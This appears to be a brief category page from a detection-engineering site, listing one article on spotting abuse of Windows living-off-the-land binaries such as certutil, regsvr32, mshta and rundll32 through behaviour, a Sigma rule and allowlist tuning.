Detection Engineering
Detecting Living-off-the-Land Binaries
How to detect LOLBins without false positives — flag abuse of certutil, regsvr32, mshta and rundll32 by behavior, with a Sigma rule and allowlist tuning.
1 article
How to detect LOLBins without false positives — flag abuse of certutil, regsvr32, mshta and rundll32 by behavior, with a Sigma rule and allowlist tuning.